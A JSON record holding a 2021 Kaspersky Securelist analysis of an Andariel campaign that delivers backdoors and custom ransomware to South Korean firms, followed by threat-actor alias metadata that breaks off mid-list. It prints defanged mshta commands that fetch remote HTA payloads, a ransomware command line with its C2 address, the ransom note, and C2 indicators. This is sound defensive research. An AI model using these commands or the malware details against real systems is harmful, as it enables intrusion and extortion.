{ "id": "9615e54c-f503-4253-b39a-e2202d2df50d", "created_at": "2026-04-06T00:14:54.765475Z", "updated_at": "2026-04-10T03:38:19.787093Z", "deleted_at": null, "sha1_hash": "f35c94bced01b50ed62c883f0a09ff211a24fa02", "title": "Andariel evolves to target South Korea with ransomware", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 3353595, "plain_text": "Andariel evolves to target South Korea with ransomware\r\nBy Seongsu Park\r\nPublished: 2021-06-15 · Archived: 2026-04-05 13:28:28 UTC\r\nExecutive summary\r\nIn April 2021, we observed a suspicious Word document with a Korean file name and decoy. It revealed a novel infection\r\nscheme and an unfamiliar payload. While we were doing our research into these findings, Malwarebytes published a nice\r\nreport with technical details about the same series of attacks, which they attributed to the Lazarus group. After a deep\r\nanalysis, we came to a more precise conclusion: the Andariel group was behind these attacks. Andariel was designated by\r\nthe Korean Financial Security Institute as a sub-group of Lazarus.\r\nOur attribution is based on the code overlaps between the second stage payload in this campaign and previous malware from\r\nthe Andariel group. Apart from the code similarity, we found an additional connection with the Andariel group. Each threat\r\nactor has characteristics when they interactively work with a backdoor shell in the post-exploitation phase. The way\r\nWindows commands and their options were used in this campaign is almost identical to previous Andariel activity.\r\nThe threat actor has been spreading the third stage payload from the middle of 2020 onwards and leveraged malicious Word\r\ndocuments and files mimicking PDF documents as infection vectors. Notably, in addition to the final backdoor, we\r\ndiscovered one victim getting infected with custom ransomware. It adds another facet to this Andariel campaign, which also\r\nsought financial profit in a previous operation involving the compromise of ATMs.\r\nFor more information please contact: intelreports@kaspersky.com\r\nBackground\r\nThis research started off with us discovering a suspicious Word document on VirusTotal. It contains an unfamiliar macro and\r\nuses novel techniques to implant the next payload. We discovered two infection methods used in these attacks in our\r\ntelemetry, where each payload has its own loader for execution in memory. The threat actor only delivered the final stage\r\npayload for selected victims.\r\nInfection procedure\r\nInitial infection or spreading\r\nAs pointed out in Malwarebytes’s public report, the actor sent weaponized documents to the victim as an initial infection\r\nvector. The documents use sophisticated infection methods to try to impede detection.\r\nhttps://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/\r\nPage 1 of 12\n\nMD5 File name Modified time Author\r\nLast saved\r\nuser\r\ned9aa858ba2c4671ca373496a4dd05d4\r\n참가신청서양식.doc\r\n(Form of participation\r\napplication.doc)\r\n2021-04-13\r\n19:39:00\r\nWilliam William\r\nThe initial infection can be summarized like this:\r\n1. 1 The user opens the malicious document and subsequently allows the macro to be executed;\r\n2. 2 A popup message box appears;\r\n3. 3 The current document gets saved to the path %temp% as HTML and accordingly stores all image files separately\r\nwithin the same directory;\r\n4. 4 Show decoy document;\r\n5. 5 Convert %temp%[document name]\\image003.png to the BMP file format and add the extension .zip;\r\n6. 6 Execute image003.zip, which actually contains HTML Application (HTA) code, with mshta.exe;\r\n7. 7 Remove previously created, temporary files.\r\nThe executed image003.zip is an HTML Application (HTA) file containing the second stage payload. This HTA code\r\ncreates the next payload at the hardcoded path C:/Users/Public/Downloads/Winvoke.exe.\r\nBesides the Microsoft Word document, the actor used an additional, alternative infection method according to our telemetry.\r\nAlthough we weren’t able to acquire the initial file, we assume the actor delivered a file disguised as a PDF, since we\r\ndiscovered artefacts containing the path of the tool ezPDFReader: c:\\program files\r\n(x86)\\unidocs\\ezpdfreader2.0g\\ezpdfwslauncher.exe. This software is developed by a South Korean software company\r\nnamed Unidocs. At this point, we’re missing clear evidence of whether the attack leveraged a vulnerability within this\r\nsoftware in the infection process or it was used to deceive users by opening a PDF document as a decoy while the HTA\r\npayload is fetched from a remote resource.\r\nNotably, the compromised website www.allamwith[.]com was used for a long period of time. We first saw the URL\r\nappearing in the context of this threat actor in September 2020 and it was still in use when we were researching this series of\r\nattacks at the end of April 2021.\r\n\"C:\\Program Files\r\n(x86)\\Unidocs\\ezPDFReader2.0G\\..\\..\\..\\Windows\\System32\\mshta.exe\"  \"hxxp://www.jinjinpig.co[.]kr/AnyCss/skin.html\"\r\n/print\r\n\"C:\\Program Files (x86)\\Unidocs\\ezPDFReader2.0G\\..\\..\\..\\Windows\\System32\\mshta.exe\"\r\n\"hxxp://adame.ypelec.co[.]kr/customize/ypelec/images/skin.html\" /print\r\n\"C:\\Program Files\r\n(x86)\\Unidocs\\ezPDFReader2.0G\\..\\..\\..\\Windows\\System32\\mshta.exe\"  \"hxxp://www.allamwith[.]com/home/css/skin.html\"\r\n/print\r\n\"C:\\Program Files\\Unidocs\\ezPDFReader2.0G\\..\\..\\..\\Windows\\System32\\mshta.exe\"\r\n\"hxxp://www.conkorea[.]com/cshop/skin/skin.html\" /print\r\nhttps://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/\r\nPage 2 of 12\n\nWhen we analyzed the above malicious URLs, many of the resources had already gone offline, but the attacker is still using\r\none distribution URL: hxxp://www.allamwith[.]com/home/css/skin.html\r\nThe URL hosts still serving the HTML Application (HTA) file exhibit similar functions as the HTA file created by the\r\nmalicious Word document. However, in the case of remotely fetched HTA code with PDF-style attacks, the next payload\r\ngets dropped to a different hardcoded path, located at C:/users/public/iexplore.exe, and eventually executed.\r\nComparison of two HTA files\r\nSecond stage payload: Simple agent\r\nThe second stage payload is responsible for communicating with the C2 server and preparing another payload for the next\r\nstage. This second stage malware decrypts the embedded payload at runtime. It uses an embedded 16-byte XOR key to\r\ndecrypt the base64 encoded payload. The decrypted payload is another portable executable file that runs in memory.\r\nXOR key and encrypted payload\r\nThe infection procedure of the second stage payload:\r\n1. 1 Create mutex named Microsoft32.\r\n2. 2 Resolve API address: base64 decoding + RC4 decryption with the key MicrosoftCorporationValidation@#$%^\u0026*\r\n()!US\r\n3. 3 Retrieve C2 addresses: base64 decoding + custom XOR decryption.\r\n4. 4 Communication with C2.\r\nAccording to the response from the C2 server, the payload is able to perform five actions:\r\nIdentifier Description Response message to C2\r\n1111 Set Sleep() interval 1111%d Success!\r\n1234 Execute received data using CreateThread() 1234 Success!\r\n8877 Save received data in a local file 8877 Success!\r\nhttps://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/\r\nPage 3 of 12\n\n8888 Execute given commands with WinExec API 8888 Success!\r\n9999 Execute given commands with cmd.exe Send command result\r\nThe malware operator appears to deliver the third stage payload by using the above functionalities, as our telemetry reveals.\r\nBoth second and third stage payloads also share an identical icon, which looks like Internet Explorer.\r\nSame icon for second stage payload and third stage payload\r\nThird stage payload: Backdoor\r\nThe third stage payload was created via the second stage payload, is interactively executed in the operation and exists in\r\nboth x64 and x86 versions. Most of them use Internet Explorer or Google Chrome icons and corresponding file names to\r\ndisguise themselves as legitimate internet browsers. The third stage decrypts the embedded payload and executes it. The\r\nembedded payload shows the same structure as the second stage payload discussed above.\r\nXOR key and encrypted payload\r\nOnce launched, it checks for the mutex QD33qhhXKK and inspects the system for signs of a sandbox environment by\r\nsearching for the presence of specific modules. The strings of module names to be checked are decoded with a hardcoded\r\nXOR key: 0x4B762A554559586F6A45656545654130\r\nsbiedll.dll: Sandboxie module\r\napi_log.dll: SunBelt SandBox module\r\ndir_watch.dll: SunBelt SandBox module\r\nWith the environment checks done, the main payload gets decrypted using the same XOR key and launched with\r\nrundll32.exe. Three C2 addresses then get extracted and decrypted using DES, with all addresses pointing to the same IP\r\n(23.229.111[.]197) in this sample. The malware then sends a hardcoded string to the C2 server:  “HTTP 1.1 /member.php\r\nSSL3.4”.\r\nhttps://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/\r\nPage 4 of 12\n\nC2 communication\r\nNext, it checks if the C2’s response data equals “HTTP 1.1 200 OK SSL2.1” and, if positive, starts conducting its backdoor\r\noperations. The samples contain debug data and thereby expose function names disclosing their purpose:\r\nModuleUpdate: Replace the current module with a batch file\r\nModuleShell: Execute Windows command, changes working directory, Connect to given IP address\r\nModuleFileManager: Get disk information, File listing, File manipulation\r\nModuleScreenCapture: Take a screenshot\r\nRansomware\r\nInterestingly, one victim was discovered to have received ransomware after the third stage payload. This ransomware sample\r\nis custom made and specifically developed by the threat actor behind this attack. This ransomware is controlled by command\r\nline parameters and can either retrieve an encryption key from the C2 or, alternatively, as an argument at launch time.\r\nParameters Description\r\n#1 Drive path to encrypt\r\n#2\r\nMalware takes two types of options:\r\n-s and -S option: specify a C2 IP address and port to source an encryption key\r\n-k and -K option: specify 32-byte initial vector (IV) and 32-byte key from command line\r\nparameters\r\n#3\r\nDepending on parameter #2:\r\n-s/-S: C2 IP address\r\n-k/-K: 32-byte initial vector (IV) value\r\n#4\r\nDepending on parameter #2:\r\n-s/-S: C2 port number\r\n-k/-K: 32-byte encryption key value\r\n#5 Attacker contact: email address\r\n#6 File extension to be used for encrypted files/file name of ransom note\r\nhttps://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/\r\nPage 5 of 12\n\n#7 Optional parameter: 24-character victim ID\r\nWe saw the malware executed with the following parameter options in our telemetry, with some parameters illustrated\r\nbelow:\r\nc:\\temp\\mshelp.exe  d:\\ -s 23.229.111[.]197 3569 sanjgold847@protonmail[.]com 12345\r\n12345FDDEE5566778899AABB\r\nUpon launch, the ransomware checks the number of parameters. If the number of arguments is less than six, the malware\r\nterminates itself. If there is no extension for the encrypted files specified, the malware uses a default extension (.3nc004) and\r\na default file name for the ransom note (3nc004.txt). If the victim ID is left unspecified, the ransomware generates a random\r\nID 24 characters long.\r\nIf the malware is executed with the -s(-S) option, it sends the victim ID to the C2 server and receives the initial vector (IV)\r\nand key to encrypt files. Each of the strings has a length of 32 characters. When the ransomware communicates with the C2\r\nserver, it uses the same authentication process and strings as the third stage payload.\r\nStrings for C2 authentication\r\nThe ransomware uses an AES-128 CBC mode algorithm to encrypt files on the victim machine. With the exception of\r\nsystem-critical files (“.exe”, “.dll”, “.sys”, .”msiins”, and “.drv” extensions), the malware encrypts files completely,\r\nirrespective of file size. However, since important system configuration files are affected by the encryption procedure as\r\nwell, it can lead to an unstable system.\r\nAs a final step, it leaves a ransom note on the desktop and in the startup folder and opens it with notepad.exe.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\nAttention! Attention! Attention!\r\nYour documents, photos, databases and other important files are encrypted and have the extension : [extension]\r\nDon't worry, you can return all your files!\r\nIf you want to decrypt all your encrypted files, the only method of recovering files is to purchase decrypt tool and\r\nunique key for you.\r\nYou just need little bitcoin.\r\nThis software will decrypt all your encrypted files.\r\nTo get this software you need write on our e - mail : [Attacker's email address]\r\nWhat gurantees do we give to you?\r\nIt's just a business. We absolutely do not care about you and your deals, except getting benefits.\r\nYou can send 2 your encrypted file from your PC with your ID and decrypt it for free.\r\nhttps://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/\r\nPage 6 of 12\n\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n+ -- - Warning-- - +\r\nDon't try to change files by yourself, Don't use any third party software for restoring your data.\r\nYou ID : [24 characters victim ID]\r\nVictims\r\nHistorically, the Andariel group has mainly targeted entities in South Korea, which, according to our telemetry, is also the\r\ncase in this campaign. We confirmed several victims in the manufacturing, home network service, media and construction\r\nsectors. Each victim is active in their respective industries and they do not appear to be connected. Therefore, it is not\r\ncurrently possible to determine a precise focus with regard to victimology.\r\nIn one instance we discovered that the threat actor delivered ransomware to a victim. This adds a financially motivated angle\r\nto these attacks. The Andariel group has already been observed directly monetizing an operation in a previous case where\r\nATMs were compromised in South Korea.\r\nhttps://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/\r\nPage 7 of 12\n\nTargeted industries in South Korea\r\nAttribution\r\nThe Malwarebytes report attributes this attack to the Lazarus group, but based on the custom string decryption routine seen\r\nin the second stage payload we came to a different conclusion. This XOR-based decryption routine has been used by\r\nAndariel malware for a long time. For instance, this decryption routine has also been used in malware (MD5\r\n9758efcf96343d0ef83854860195c4b4) we reported earlier to our Threat Intelligence Portal customers on Andariel’s 2019\r\nactivity. In addition, malware (MD5 3703c22e33629abd440483e0f60abf79) dropped by a malicious Word document in early\r\n2018 – also attributed to Andariel – exhibits the same decryption routine.\r\nCode overlap with previous Andariel malware\r\nhttps://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/\r\nPage 8 of 12\n\nAn additional indicator pointing to the Andariel group can be discovered in the post-exploitation commands on victim\r\nmachines. As a rule, each APT actor displays a different command line signature when working interactively via an installed\r\nbackdoor. As a result of comparing previously seen Windows commands delivered by the Andariel group, we can confirm\r\nthat both cases used the same Windows command options.\r\nWhen checking network connection with the “netstat” command, both cases use the “-naop” option in conjunction\r\nwith the “tcp“\r\nFiltering the result, both cases use the “findstr” command instead of “find”.\r\nThe Lazarus group has been observed using Windows commands that differ from Andariel, such as preferring the “-ano”\r\noption with the “netstat” command and “find”  as a filter command, rather than “findstr”.\r\nCommands used by Andariel group in\r\nprevious cases\r\nCommands seen in the attacks\r\ndiscussed in this report\r\nCommands used by\r\nLazarus group\r\nnetstat -naop tcp\r\nnetstat -naop tcp | findstr 2008\r\ntasklist | findstr sqlwriter.exe\r\ntasklist | findstr juchmon.exe\r\nnetstat -naop tcp | findstr LISTEN\r\ntasklist | findstr 3756\r\ntasklist | findstr 15412\r\nnetstat -ano | find “:445”\r\nnetstat -ano | find “EST”\r\nHowever, apart from the connections to the Andariel group, we discovered two weaker ties to the Lazarus group in the third\r\nstage payload. It shows an overlap with the PEBBLEDASH malware family, previously published by CISA. CISA attributed\r\nthis malware variant to a threat actor they dubbed Hidden Cobra. We called this malware variant Manuscrypt and attributed\r\nit to the Lazarus group.\r\nOne overlap is a batch script used in both instances in order to remove itself:\r\nIdentical batch script\r\nBoth malware types enumerate local drives and partitions in the process, where both instances use the string “CD\r\nDrive” when the current drive type is “DRIVE_CDROM“.\r\nhttps://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/\r\nPage 9 of 12\n\nSame drive checking result\r\nIn conclusion, we assess that the Andariel group is behind this attack. However, it also reveals a faint connection to the\r\nLazarus group.\r\nConclusions\r\nThe Andariel group has continued to focus on targets in South Korea, but their tools and techniques have evolved\r\nconsiderably. By closely examining the whole infection procedure, we discovered that the Andariel group intended to spread\r\nransomware through this attack and, by doing so, they have underlined their place as a financially motivated state-sponsored\r\nactor.\r\nIndicators of compromise\r\nMalicious documents\r\ned9aa858ba2c4671ca373496a4dd05d4    참가신청서양식.doc (Application form.doc)\r\n71759cca8c700646b4976b19b9abd6fe    생활비지급.doc (Payment of living costs.doc)\r\n3ba4c71c6b087e6d06d668bb22a5b59a    test3.doc\r\nd5e974a3386fc99d2932756ca165a451    결의대회초안.doc (Draft for resolution conference.doc)\r\nSecond stage payload (Simple agent)\r\nf4d46629ca15313b94992f3798718df7    %PUBLIC%\\downloads\\winvoke.exe\r\n118cfa75e386ed45bec297f8865de671    %PUBLIC%\\Libraries\\AppStore.exe\r\n53648bf8f0121130edb42c626d7c2fc4\r\n1bb267c96ec2925f6ae3716d831671cf    %PUBLIC%\\Libraries\\AlgStore.exe\r\n0812ce08a75e5fc774a114436e88cd06\r\n927f0a1090255bc724953e1f5a09a070    %PUBLIC%\\iexplore.exe\r\n145735911e9c8bafa4c9c1d7397199fc    iexplore.exe\r\n551c5b3595e9fc1081b5e1f10e3c1a59    iexplore.exe\r\nf3fcb306cb93489f999e00a7ef63536b\r\n0ecfa51cd4bf1a9841a07bdb5bfcd0ab\r\n4d30612a928faf7643b14bd85d8433cc\r\ndf1e7a42c92ecb01290d896dca4e5faa\r\nThird stage payload (Backdoor)\r\n3b1b8702c4d3e2e194c4cc8f09a57d06    %PUBLIC%\\chrome.exe\r\nef3a6978c7d454f9f6316f2d267f108d\r\nhttps://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/\r\nPage 10 of 12\n\n33c2e887c3d337eeffbbd8745bfdfc8f\r\nbf4a822f04193b953689e277a9e1f4f1\r\n6e710f6f02fdde1e4adf06935a296fd8\r\n38917e8aa02b58b09401383115ab549e\r\n67220baf2a415876bee2d43c11f6e9ad\r\n3bf9b83e00544ac383aaef795e3ded78    ixplore.exe\r\n159ad2afcab80e83397388e495d215a5\r\n21ec5f03aab696f0a239c6ea5e50c014    %PUBLIC%\\iexplore.exe\r\nb5874eb1119327be51ae03adcbf4d3e0    %USERPROFILE%\\iexplore.exe\r\n8b378eabcec13c3c925cc7ca4d191f5f\r\n5b387a9130e9b9782ca4c225c8e641b3\r\n25c8e057864126e6648c34581e7b4f20\r\n62eae43a36cbc4ed935d8df007f5650b\r\n8d74112c97e98fef4c5d77200f34e4f2\r\nb5648f5e115da778615dfd0dc772b647    %USERPROFILE%\\iexplore.exe\r\neef723ff0b5c0b10d391955250f781b3\r\nd1a99087fa3793fbc4d0adb26e87efce\r\nd63bb2c5cd4cfbe8fabf1640b569db6a\r\nfffad123bd6df76f94ffc9b384a067fc\r\nabaeecd83a585ec0c5f1153199938e83\r\n569246a3325effa11cb8ff362428ab2c\r\n3b494133f1a673b2b04df4f4f996a25d\r\nfc3c31bbdbeee99aba5f7a735fac7a7e\r\nRansomware\r\nd96fcd2159643684f4573238f530d03b    %TEMP%\\mshelp.exe\r\nSecond stage C2 servers\r\nhxxp://ddjm[.]co[.]kr/bbs/icon/skin/skin[.]php\r\nhxxp://hivekorea[.]com/jdboard/member/list[.]php\r\nhxxp://mail[.]namusoft[.]kr/jsp/user/eam/board[.]jsp\r\nhxxp://mail[.]sisnet[.]co[.]kr/jsp/user/sms/sms_recv[.]jsp\r\nhxxp://snum[.]or[.]kr/skin_img/skin[.]php\r\nhxxp://www[.]allamwith[.]com/home/mobile/list[.]php\r\nhxxp://www[.]conkorea[.]com/cshop/banner/list[.]php\r\nhxxp://www[.]ddjm[.]co[.]kr/bbs/icon/skin/skin[.]php\r\nhxxp://www[.]jinjinpig[.]co[.]kr/Anyboard/skin/board[.]php\r\nThird stage C2 servers\r\n198.55.119.112:443\r\n45.58.112.77:443\r\n23.229.111.197:8443\r\n23.229.111.197:443\r\n185.208.158.208:443\r\nMITRE ATT\u0026CK Mapping\r\nhttps://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/\r\nPage 11 of 12\n\nTactic Technique Technique Name\r\nResource Development\r\nT1584.006\r\nT1583.003\r\nCompromise Infrastructure: Web Services\r\nAcquire Infrastructure: Virtual Private Server\r\nInitial Access T1566.001 Phishing: Spearphishing Attachment\r\nExecution\r\nT1204.002\r\nT1059.007\r\nUser Execution: Malicious File\r\nCommand and Scripting Interpreter: JavaScript\r\nDefense Evasion\r\nT1036.005\r\nT1027.003\r\nT1497.001\r\nMasquerading: Match Legitimate Name or Location\r\nObfuscated Files or Information: Steganography\r\nVirtualization/Sandbox Evasion: System Checks\r\nDiscovery\r\nT1049\r\nT1057\r\nSystem Network Connections Discovery\r\nProcess Discovery\r\nCollection T1113 Screen Capture\r\nCommand and Control\r\nT1071.001\r\nT1095\r\nT1573.001\r\nApplication Layer Protocol: Web Protocols\r\nNon-Application Layer Protocol\r\nEncrypted Channel: Symmetric Cryptography\r\nExfiltration T1041 Exfiltration Over C2 Channel\r\nImpact T1486 Data Encrypted for Impact\r\nSource: https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/\r\nhttps://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/\r\nPage 12 of 12", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia", "ETDA", "MITRE" ], "references": [ "https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/" ], "report_names": [ "102811" ], "threat_actors": [ { "id": "838f6ced-12a4-4893-991a-36d231d96efd", "created_at": "2022-10-25T15:50:23.347455Z", "updated_at": "2026-04-10T02:00:05.295717Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "Andariel", "Silent Chollima", "PLUTONIUM", "Onyx Sleet" ], "source_name": "MITRE:Andariel", "tools": [ "Rifdoor", "gh0st RAT" ], "source_id": "MITRE", "reports": null }, { "id": "34eea331-d052-4096-ae03-a22f1d090bd4", "created_at": "2025-08-07T02:03:25.073494Z", "updated_at": "2026-04-10T02:00:03.709243Z", "deleted_at": null, "main_name": "NICKEL ACADEMY", "aliases": [ "ATK3 ", "Black Artemis ", "COVELLITE ", "CTG-2460 ", "Citrine Sleet ", "Diamond Sleet ", "Guardians of Peace", "HIDDEN COBRA ", "High Anonymous", "Labyrinth Chollima ", "Lazarus Group ", "NNPT Group", "New Romanic Cyber Army Team", "Temp.Hermit ", "UNC577 ", "Who Am I?", "Whois Team", "ZINC " ], "source_name": "Secureworks:NICKEL ACADEMY", "tools": [ "Destover", "KorHigh", "Volgmer" ], "source_id": "Secureworks", "reports": null }, { "id": "110e7160-a8cc-4a66-8550-f19f7d418117", "created_at": "2023-01-06T13:46:38.427592Z", "updated_at": "2026-04-10T02:00:02.969896Z", "deleted_at": null, "main_name": "Silent Chollima", "aliases": [ "Onyx Sleet", "PLUTONIUM", "OperationTroy", "Guardian of Peace", "GOP", "WHOis Team", "Andariel", "Subgroup: Andariel" ], "source_name": "MISPGALAXY:Silent Chollima", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "bc6e3644-3249-44f3-a277-354b7966dd1b", "created_at": "2022-10-25T16:07:23.760559Z", "updated_at": "2026-04-10T02:00:04.741239Z", "deleted_at": null, "main_name": "Andariel", "aliases": [ "APT 45", "Andariel", "G0138", "Jumpy Pisces", "Onyx Sleet", "Operation BLACKMINE", "Operation BLACKSHEEP/Phase 3.", "Operation Blacksmith", "Operation DESERTWOLF/Phase 3", "Operation GHOSTRAT", "Operation GoldenAxe", "Operation INITROY/Phase 1", "Operation INITROY/Phase 2", "Operation Mayday", "Operation VANXATM", "Operation XEDA", "Plutonium", "Silent Chollima", "Stonefly" ], "source_name": "ETDA:Andariel", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "732597b1-40a8-474c-88cc-eb8a421c29f1", "created_at": "2025-08-07T02:03:25.087732Z", "updated_at": "2026-04-10T02:00:03.776007Z", "deleted_at": null, "main_name": "NICKEL GLADSTONE", "aliases": [ "APT38 ", "ATK 117 ", "Alluring Pisces ", "Black Alicanto ", "Bluenoroff ", "CTG-6459 ", "Citrine Sleet ", "HIDDEN COBRA ", "Lazarus Group", "Sapphire Sleet ", "Selective Pisces ", "Stardust Chollima ", "T-APT-15 ", "TA444 ", "TAG-71 " ], "source_name": "Secureworks:NICKEL GLADSTONE", "tools": [ "AlphaNC", "Bankshot", "CCGC_Proxy", "Ratankba", "RustBucket", "SUGARLOADER", "SwiftLoader", "Wcry" ], "source_id": "Secureworks", "reports": null }, { "id": "a2b92056-9378-4749-926b-7e10c4500dac", "created_at": "2023-01-06T13:46:38.430595Z", "updated_at": "2026-04-10T02:00:02.971571Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Operation DarkSeoul", "Bureau 121", "Group 77", "APT38", "NICKEL GLADSTONE", "G0082", "COPERNICIUM", "Moonstone Sleet", "Operation GhostSecret", "APT 38", "Appleworm", "Unit 121", "ATK3", "G0032", "ATK117", "NewRomanic Cyber Army Team", "Nickel Academy", "Sapphire Sleet", "Lazarus group", "Hastati Group", "Subgroup: Bluenoroff", "Operation Troy", "Black Artemis", "Dark Seoul", "Andariel", "Labyrinth Chollima", "Operation AppleJeus", "COVELLITE", "Citrine Sleet", "DEV-0139", "DEV-1222", "Hidden Cobra", "Bluenoroff", "Stardust Chollima", "Whois Hacking Team", "Diamond Sleet", "TA404", "BeagleBoyz", "APT-C-26" ], "source_name": "MISPGALAXY:Lazarus Group", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "771d9263-076e-4b6e-bd58-92b6555eb739", "created_at": "2025-08-07T02:03:25.092436Z", "updated_at": "2026-04-10T02:00:03.758541Z", "deleted_at": null, "main_name": "NICKEL HYATT", "aliases": [ "APT45 ", "Andariel", "Dark Seoul", "Jumpy Pisces ", "Onyx Sleet ", "RIFLE Campaign", "Silent Chollima ", "Stonefly ", "UN614 " ], "source_name": "Secureworks:NICKEL HYATT", "tools": [ "ActiveX 0-day", "DTrack", "HazyLoad", "HotCriossant", "Rifle", "UnitBot", "Valefor" ], "source_id": "Secureworks", "reports": null }, { "id": "32a223a8-3c79-4146-87c5-8557d38662ae", "created_at": "2022-10-25T15:50:23.703698Z", "updated_at": "2026-04-10T02:00:05.261989Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "Lazarus Group", "Labyrinth Chollima", "HIDDEN COBRA", "Guardians of Peace", "NICKEL ACADEMY", "Diamond Sleet" ], "source_name": "MITRE:Lazarus Group", "tools": [ "RawDisk", "Proxysvc", "BADCALL", "FALLCHILL", "WannaCry", "MagicRAT", "HOPLIGHT", "TYPEFRAME", "Dtrack", "HotCroissant", "HARDRAIN", "Dacls", "KEYMARBLE", "TAINTEDSCRIBE", "AuditCred", "netsh", "ECCENTRICBANDWAGON", "AppleJeus", "BLINDINGCAN", "ThreatNeedle", "Volgmer", "Cryptoistic", "RATANKBA", "Bankshot" ], "source_id": "MITRE", "reports": null }, { "id": "f32df445-9fb4-4234-99e0-3561f6498e4e", "created_at": "2022-10-25T16:07:23.756373Z", "updated_at": "2026-04-10T02:00:04.739611Z", "deleted_at": null, "main_name": "Lazarus Group", "aliases": [ "APT-C-26", "ATK 3", "Appleworm", "Citrine Sleet", "DEV-0139", "Diamond Sleet", "G0032", "Gleaming Pisces", "Gods Apostles", "Gods Disciples", "Group 77", "Guardians of Peace", "Hastati Group", "Hidden Cobra", "ITG03", "Jade Sleet", "Labyrinth Chollima", "Lazarus Group", "NewRomanic Cyber Army Team", "Operation 99", "Operation AppleJeus", "Operation AppleJeus sequel", "Operation Blockbuster: Breach of Sony Pictures Entertainment", "Operation CryptoCore", "Operation Dream Job", "Operation Dream Magic", "Operation Flame", "Operation GhostSecret", "Operation In(ter)caption", "Operation LolZarus", "Operation Marstech Mayhem", "Operation No Pineapple!", "Operation North Star", "Operation Phantom Circuit", "Operation Sharpshooter", "Operation SyncHole", "Operation Ten Days of Rain / DarkSeoul", "Operation Troy", "SectorA01", "Slow Pisces", "TA404", "TraderTraitor", "UNC2970", "UNC4034", "UNC4736", "UNC4899", "UNC577", "Whois Hacking Team" ], "source_name": "ETDA:Lazarus Group", "tools": [ "3CX Backdoor", "3Rat Client", "3proxy", "AIRDRY", "ARTFULPIE", "ATMDtrack", "AlphaNC", "Alreay", "Andaratm", "AngryRebel", "AppleJeus", "Aryan", "AuditCred", "BADCALL", "BISTROMATH", "BLINDINGCAN", "BTC Changer", "BUFFETLINE", "BanSwift", "Bankshot", "Bitrep", "Bitsran", "BlindToad", "Bookcode", "BootWreck", "BottomLoader", "Brambul", "BravoNC", "Breut", "COLDCAT", "COPPERHEDGE", "CROWDEDFLOUNDER", "Castov", "CheeseTray", "CleanToad", "ClientTraficForwarder", "CollectionRAT", "Concealment Troy", "Contopee", "CookieTime", "Cyruslish", "DAVESHELL", "DBLL Dropper", "DLRAT", "DRATzarus", "DRATzarus RAT", "Dacls", "Dacls RAT", "DarkComet", "DarkKomet", "DeltaCharlie", "DeltaNC", "Dembr", "Destover", "DoublePulsar", "Dozer", "Dtrack", "Duuzer", "DyePack", "ECCENTRICBANDWAGON", "ELECTRICFISH", "Escad", "EternalBlue", "FALLCHILL", "FYNLOS", "FallChill RAT", "Farfli", "Fimlis", "FoggyBrass", "FudModule", "Fynloski", "Gh0st RAT", "Ghost RAT", "Gopuram", "HARDRAIN", "HIDDEN COBRA RAT/Worm", "HLOADER", "HOOKSHOT", "HOPLIGHT", "HOTCROISSANT", "HOTWAX", "HTTP Troy", "Hawup", "Hawup RAT", "Hermes", "HotCroissant", "HotelAlfa", "Hotwax", "HtDnDownLoader", "Http Dr0pper", "ICONICSTEALER", "Joanap", "Jokra", "KANDYKORN", "KEYMARBLE", "Kaos", "KillDisk", "KillMBR", "Koredos", "Krademok", "LIGHTSHIFT", "LIGHTSHOW", "LOLBAS", "LOLBins", "Lazarus", "LightlessCan", "Living off the Land", "MATA", "MBRkiller", "MagicRAT", "Manuscrypt", "Mimail", "Mimikatz", "Moudour", "Mydoom", "Mydoor", "Mytob", "NACHOCHEESE", "NachoCheese", "NestEgg", "NickelLoader", "NineRAT", "Novarg", "NukeSped", "OpBlockBuster", "PCRat", "PEBBLEDASH", "PLANKWALK", "POOLRAT", "PSLogger", "PhanDoor", "Plink", "PondRAT", "PowerBrace", "PowerRatankba", "PowerShell RAT", "PowerSpritz", "PowerTask", "Preft", "ProcDump", "Proxysvc", "PuTTY Link", "QUICKRIDE", "QUICKRIDE.POWER", "Quickcafe", "QuiteRAT", "R-C1", "ROptimizer", "Ratabanka", "RatabankaPOS", "Ratankba", "RatankbaPOS", "RawDisk", "RedShawl", "Rifdoor", "Rising Sun", "Romeo-CoreOne", "RomeoAlfa", "RomeoBravo", "RomeoCharlie", "RomeoCore", "RomeoDelta", "RomeoEcho", "RomeoFoxtrot", "RomeoGolf", "RomeoHotel", "RomeoMike", "RomeoNovember", "RomeoWhiskey", "Romeos", "RustBucket", "SHADYCAT", "SHARPKNOT", "SIGFLIP", "SIMPLESEA", "SLICKSHOES", "SORRYBRUTE", "SUDDENICON", "SUGARLOADER", "SheepRAT", "SierraAlfa", "SierraBravo", "SierraCharlie", "SierraJuliett-MikeOne", "SierraJuliett-MikeTwo", "SimpleTea", "SimplexTea", "SmallTiger", "Stunnel", "TAINTEDSCRIBE", "TAXHAUL", "TFlower", "TOUCHKEY", "TOUCHMOVE", "TOUCHSHIFT", "TOUCHSHOT", "TWOPENCE", "TYPEFRAME", "Tdrop", "Tdrop2", "ThreatNeedle", "Tiger RAT", "TigerRAT", "Trojan Manuscript", "Troy", "TroyRAT", 